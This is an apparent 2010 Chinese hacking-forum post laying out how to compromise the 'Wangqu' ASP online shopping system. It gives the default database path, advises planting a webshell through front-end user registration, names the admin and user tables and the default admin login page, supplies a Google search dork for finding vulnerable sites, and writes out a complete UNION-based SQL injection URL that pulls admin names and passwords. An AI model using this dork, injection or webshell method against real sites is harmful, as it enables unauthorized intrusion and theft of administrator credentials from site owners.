|
- 帖子
- 34
- 积分
- 74
- 威望
- 81
- 金钱
- 86
- 在线时间
- 8 小时
|
数据库的默认后串为.asp,可以考虑在前台注册用户用户给数据库里面插马.
1. 分析源码.
2. 数据库中插马.
3. 寻找上传之类的文件分析.
4. 后台的利用分析.
2.数据库.
\cnhwwdata\cnhww.asp 默认的数据库路径.
如果数据库路径没修改,可以考虑在前台注册用户拿shell
Cnhww 后台用户表段.
User 前台用户表段.
查询Cnhww 表里面的
Admin /password
后台拿shell的方法
网趣网上购物系统时尚版
后台默认地址: admin/login.asp
关键字
inurl:Price.asp?anid=
利用方法
/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww |
|
发表于 2010-1-20 17:40
| 
